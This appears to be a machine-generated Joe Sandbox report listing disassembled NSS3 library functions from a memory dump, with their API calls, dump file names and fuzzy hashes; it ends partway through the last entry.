                                                                        Function 6CB3DDD0 Relevance: 10.6, APIs: 7, Instructions: 106COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CB3DDEC
                                                                          • Part of subcall function 6CB70840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CB708B4
                                                                        • PK11_DigestBegin.NSS3(00000000), ref: 6CB3DE70
                                                                        • PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6CB3DE83
                                                                        • HASH_ResultLenByOidTag.NSS3(?), ref: 6CB3DE95
                                                                        • PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6CB3DEAE
                                                                        • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CB3DEBB
                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB3DECC
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
                                                                        • String ID:
                                                                        • API String ID: 1091488953-0
                                                                        • Opcode ID: fcaa98ae466438eac48993e583edf0eb6c7de000e51ccb40269ef1d9cbed1cad
                                                                        • Instruction ID: 147c104ce8020b6579621f7944ceeebfc9814f40668f53455b494bdbcfb7876a
                                                                        • Opcode Fuzzy Hash: fcaa98ae466438eac48993e583edf0eb6c7de000e51ccb40269ef1d9cbed1cad
                                                                        • Instruction Fuzzy Hash: 0331A4B29102B46BDF01AE79BC41BBF7AA8DF54608F051125ED0DA7741FB31D91886E2
                                                                        Function 6CB6DC10 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6CB6D9E4,00000000), ref: 6CB6DC30
                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6CB6D9E4,00000000), ref: 6CB6DC4E
                                                                        • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6CB6D9E4,00000000), ref: 6CB6DC5A
                                                                        • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CB6DC7E
                                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CB6DCAD
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Alloc_Util$Arenamemcpy
                                                                        • String ID:
                                                                        • API String ID: 2632744278-0
                                                                        • Opcode ID: cb2c069e36f987404ea542677e7c8db6e142cd7cfb5cc3860180697e6a0d67d5
                                                                        • Instruction ID: 5b424e89314a2e99e34cf4e84cc13b8528b393afe376d86d7324424abf583d68
                                                                        • Opcode Fuzzy Hash: cb2c069e36f987404ea542677e7c8db6e142cd7cfb5cc3860180697e6a0d67d5
                                                                        • Instruction Fuzzy Hash: 69316FB5A002849FD710CF2AE884B96B7F8EF1535CF248429E94CCBB41E771E944CBA1
                                                                        Function 6CB28C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • TlsGetValue.KERNEL32 ref: 6CB28C1B
                                                                        • EnterCriticalSection.KERNEL32 ref: 6CB28C34
                                                                        • PL_ArenaAllocate.NSS3 ref: 6CB28C65
                                                                        • PR_Unlock.NSS3 ref: 6CB28C9C
                                                                        • PR_Unlock.NSS3 ref: 6CB28CB6
                                                                          • Part of subcall function 6CBBDD70: TlsGetValue.KERNEL32 ref: 6CBBDD8C
                                                                          • Part of subcall function 6CBBDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CBBDDB4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                        • String ID: KRAM
                                                                        • API String ID: 4127063985-3815160215
                                                                        • Opcode ID: 728f7fe5f00393364530436b098c99442bbcdfb6748cf76360a966b088ac5412
                                                                        • Instruction ID: a6ea732cea647e5cae8fe763ecb8a5c4a633e5ce48f11606699a647028a49fb0
                                                                        • Opcode Fuzzy Hash: 728f7fe5f00393364530436b098c99442bbcdfb6748cf76360a966b088ac5412
                                                                        • Instruction Fuzzy Hash: BF216DB2A056518FD700AF79C484569FBF4FF45304F05896AD8888B751EB3AD889CB92
                                                                        Function 6CC22C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PR_EnterMonitor.NSS3 ref: 6CC22CA0
                                                                        • PR_ExitMonitor.NSS3 ref: 6CC22CBE
                                                                        • calloc.MOZGLUE(00000001,00000014), ref: 6CC22CD1
                                                                        • strdup.MOZGLUE(?), ref: 6CC22CE1
                                                                        • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6CC22D27
                                                                        Strings
                                                                        • Loaded library %s (static lib), xrefs: 6CC22D22
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                        • String ID: Loaded library %s (static lib)
                                                                        • API String ID: 3511436785-2186981405
                                                                        • Opcode ID: 6483a7906f40636ec87e7c6898f5629ad0666dbb7a1bed2be5f6cd4211182d04
                                                                        • Instruction ID: 6fc37d16f453c0be58d39f7e4bee18ef597c8eafa887fd5e29a3a15cbdbb8741
                                                                        • Opcode Fuzzy Hash: 6483a7906f40636ec87e7c6898f5629ad0666dbb7a1bed2be5f6cd4211182d04
                                                                        • Instruction Fuzzy Hash: EC1104B5B112509FEB019F1AD868A6A77B4EB4532DF54813DD809C7B41E735E808CBB1
                                                                        Function 6CB1BDC0 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6CB1BDCA
                                                                          • Part of subcall function 6CB70FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CB187ED,00000800,6CB0EF74,00000000), ref: 6CB71000
                                                                          • Part of subcall function 6CB70FF0: PR_NewLock.NSS3(?,00000800,6CB0EF74,00000000), ref: 6CB71016
                                                                          • Part of subcall function 6CB70FF0: PL_InitArenaPool.NSS3(00000000,security,6CB187ED,00000008,?,00000800,6CB0EF74,00000000), ref: 6CB7102B
                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CB1BDDB
                                                                          • Part of subcall function 6CB710C0: TlsGetValue.KERNEL32(?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB710F3
                                                                          • Part of subcall function 6CB710C0: EnterCriticalSection.KERNEL32(?,?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB7110C
                                                                          • Part of subcall function 6CB710C0: PL_ArenaAllocate.NSS3(?,?,?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB71141
                                                                          • Part of subcall function 6CB710C0: PR_Unlock.NSS3(?,?,?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB71182
                                                                          • Part of subcall function 6CB710C0: TlsGetValue.KERNEL32(?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB7119C
                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CB1BDEC
                                                                          • Part of subcall function 6CB710C0: PL_ArenaAllocate.NSS3(?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB7116E
                                                                        • SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6CB1BE03
                                                                          • Part of subcall function 6CB6FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CB68D2D,?,00000000,?), ref: 6CB6FB85
                                                                          • Part of subcall function 6CB6FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CB6FBB1
                                                                        • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB1BE22
                                                                        • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB1BE30
                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CB1BE3B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
                                                                        • String ID:
                                                                        • API String ID: 1821307800-0
                                                                        • Opcode ID: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
                                                                        • Instruction ID: 533a55c9e92de13671614eedfaf07e1f4f66feadd17c93ba9b0f37687cb8e547
                                                                        • Opcode Fuzzy Hash: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
                                                                        • Instruction Fuzzy Hash: 74012BE6A4428166F61016667C01FAF364C8F5028DF140031FE18DAFC2FB51E11883B6
                                                                        Function 6CBA1C60 Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CBA1C74
                                                                          • Part of subcall function 6CBBC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBBC2BF
                                                                        • DeleteCriticalSection.KERNEL32(?), ref: 6CBA1C92
                                                                        • free.MOZGLUE(?), ref: 6CBA1C99
                                                                        • DeleteCriticalSection.KERNEL32(?), ref: 6CBA1CCB
                                                                        • free.MOZGLUE(?), ref: 6CBA1CD2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalDeleteSectionfree$ErrorValue
                                                                        • String ID:
                                                                        • API String ID: 3805613680-0
                                                                        • Opcode ID: fd8dd5cbdc613e84ad97fc96dfe92755fb2932c15159944160e3ae9d15df05a1
                                                                        • Instruction ID: 113ad5a5a20fa57dc98f5c7f149516d7d23d54727cca8e1c4666aa095863b06b
                                                                        • Opcode Fuzzy Hash: fd8dd5cbdc613e84ad97fc96dfe92755fb2932c15159944160e3ae9d15df05a1
                                                                        • Instruction Fuzzy Hash: CA01D2B1F096B0EFDF21EFE59D0DB593BB8E706318F040025E94AA6A40E730D04587A2
                                                                        Function 6CC01C40 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,6CB03D77,?,?,6CB04E1D), ref: 6CC01C8A
                                                                        • sqlite3_free.NSS3(00000000), ref: 6CC01CB6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: sqlite3_freesqlite3_mprintf
                                                                        • String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s
                                                                        • API String ID: 1840970956-3705377941
                                                                        • Opcode ID: e8e6df76a12ef8093abeedd9b9500a61a7dd3af3ad91b556d73529616a77a403
                                                                        • Instruction ID: 88e8d46f787876491f9a9dec52edf1eb5401b132950b1c978cd85cd2fd50ae10
                                                                        • Opcode Fuzzy Hash: e8e6df76a12ef8093abeedd9b9500a61a7dd3af3ad91b556d73529616a77a403
                                                                        • Instruction Fuzzy Hash: F20124B5B002005BD700AB2CD80297177E5EF8638CB14886DE989DBB12FA22E89AC751
                                                                        Function 6CB7ED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6CB7ED6B
                                                                        • PORT_Alloc_Util.NSS3(00000000), ref: 6CB7EDCE
                                                                          • Part of subcall function 6CB70BE0: malloc.MOZGLUE(6CB68D2D,?,00000000,?), ref: 6CB70BF8
                                                                          • Part of subcall function 6CB70BE0: TlsGetValue.KERNEL32(6CB68D2D,?,00000000,?), ref: 6CB70C15
                                                                        • free.MOZGLUE(00000000,?,?,?,?,6CB7B04F), ref: 6CB7EE46
                                                                        • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CB7EECA
                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CB7EEEA
                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CB7EEFB
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                                        • String ID:
                                                                        • API String ID: 3768380896-0
                                                                        • Opcode ID: 83e39fc1244fa8c3d9167a2622c019738637c5cb6adaadb6533d8a73165ffdf2
                                                                        • Instruction ID: 9cd73617bee08f635644092497dcf0ef5c1203c971ebe5734201d37b72de7a31
                                                                        • Opcode Fuzzy Hash: 83e39fc1244fa8c3d9167a2622c019738637c5cb6adaadb6533d8a73165ffdf2
                                                                        • Instruction Fuzzy Hash: 53814BB5A002859FEB24CF55D984AAE77B5FF88308F144429EC269BB51D730E914CBB2
                                                                        Function 6CB7CCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 6CB7C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CB7DAE2,?), ref: 6CB7C6C2
                                                                        • PR_Now.NSS3 ref: 6CB7CD35
                                                                          • Part of subcall function 6CBD9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CC20A27), ref: 6CBD9DC6
                                                                          • Part of subcall function 6CBD9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CC20A27), ref: 6CBD9DD1
                                                                          • Part of subcall function 6CBD9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CBD9DED
                                                                          • Part of subcall function 6CB66C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CB11C6F,00000000,00000004,?,?), ref: 6CB66C3F
                                                                        • PR_GetCurrentThread.NSS3 ref: 6CB7CD54
                                                                          • Part of subcall function 6CBD9BF0: TlsGetValue.KERNEL32(?,?,?,6CC20A75), ref: 6CBD9C07
                                                                          • Part of subcall function 6CB67260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CB11CCC,00000000,00000000,?,?), ref: 6CB6729F
                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB7CD9B
                                                                        • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6CB7CE0B
                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6CB7CE2C
                                                                          • Part of subcall function 6CB710C0: TlsGetValue.KERNEL32(?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB710F3
                                                                          • Part of subcall function 6CB710C0: EnterCriticalSection.KERNEL32(?,?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB7110C
                                                                          • Part of subcall function 6CB710C0: PL_ArenaAllocate.NSS3(?,?,?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB71141
                                                                          • Part of subcall function 6CB710C0: PR_Unlock.NSS3(?,?,?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB71182
                                                                          • Part of subcall function 6CB710C0: TlsGetValue.KERNEL32(?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB7119C
                                                                        • PORT_ArenaMark_Util.NSS3(00000000), ref: 6CB7CE40
                                                                          • Part of subcall function 6CB714C0: TlsGetValue.KERNEL32 ref: 6CB714E0
                                                                          • Part of subcall function 6CB714C0: EnterCriticalSection.KERNEL32 ref: 6CB714F5
                                                                          • Part of subcall function 6CB714C0: PR_Unlock.NSS3 ref: 6CB7150D
                                                                          • Part of subcall function 6CB7CEE0: PORT_ArenaMark_Util.NSS3(?,6CB7CD93,?), ref: 6CB7CEEE
                                                                          • Part of subcall function 6CB7CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CB7CD93,?), ref: 6CB7CEFC
                                                                          • Part of subcall function 6CB7CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CB7CD93,?), ref: 6CB7CF0B
                                                                          • Part of subcall function 6CB7CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CB7CD93,?), ref: 6CB7CF1D
                                                                          • Part of subcall function 6CB7CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CB7CD93,?), ref: 6CB7CF47
                                                                          • Part of subcall function 6CB7CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CB7CD93,?), ref: 6CB7CF67
                                                                          • Part of subcall function 6CB7CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6CB7CD93,?,?,?,?,?,?,?,?,?,?,?,6CB7CD93,?), ref: 6CB7CF78
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                        • String ID:
                                                                        • API String ID: 3748922049-0
                                                                        • Opcode ID: ceb7828f9bbad41c20bc411ade408d1c4311a5ede6c0ddf1ae9b156dccbb8658
                                                                        • Instruction ID: 3c96a417c235a63213a3b45d079fdc516b82ade4da57fe0b2dc263a55f224189
                                                                        • Opcode Fuzzy Hash: ceb7828f9bbad41c20bc411ade408d1c4311a5ede6c0ddf1ae9b156dccbb8658
                                                                        • Instruction Fuzzy Hash: DE519276A005509BE720DF69DC40BAA73F4EF48348F250528DD69A7B81EB31F905CBA2
                                                                        Function 6CBA3C80 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 6CBA5B40: PR_GetIdentitiesLayer.NSS3 ref: 6CBA5B56
                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBA3D3F
                                                                          • Part of subcall function 6CB1BA90: PORT_NewArena_Util.NSS3(00000800,6CBA3CAF,?), ref: 6CB1BABF
                                                                          • Part of subcall function 6CB1BA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6CBA3CAF,?), ref: 6CB1BAD5
                                                                          • Part of subcall function 6CB1BA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6CBA3CAF,?), ref: 6CB1BB08
                                                                          • Part of subcall function 6CB1BA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6CBA3CAF,?), ref: 6CB1BB1A
                                                                          • Part of subcall function 6CB1BA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6CBA3CAF,?), ref: 6CB1BB3B
                                                                        • PR_EnterMonitor.NSS3(?), ref: 6CBA3CCB
                                                                          • Part of subcall function 6CBD9090: TlsGetValue.KERNEL32 ref: 6CBD90AB
                                                                          • Part of subcall function 6CBD9090: TlsGetValue.KERNEL32 ref: 6CBD90C9
                                                                          • Part of subcall function 6CBD9090: EnterCriticalSection.KERNEL32 ref: 6CBD90E5
                                                                          • Part of subcall function 6CBD9090: TlsGetValue.KERNEL32 ref: 6CBD9116
                                                                          • Part of subcall function 6CBD9090: LeaveCriticalSection.KERNEL32 ref: 6CBD913F
                                                                        • PR_EnterMonitor.NSS3(?), ref: 6CBA3CE2
                                                                        • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CBA3CF8
                                                                        • PR_ExitMonitor.NSS3(?), ref: 6CBA3D15
                                                                        • PR_ExitMonitor.NSS3(?), ref: 6CBA3D2E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
                                                                        • String ID:
                                                                        • API String ID: 4030862364-0
                                                                        • Opcode ID: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
                                                                        • Instruction ID: 68a9aacca5d62874a760c261139329220a55b0545024cf0254cea0426206bae9
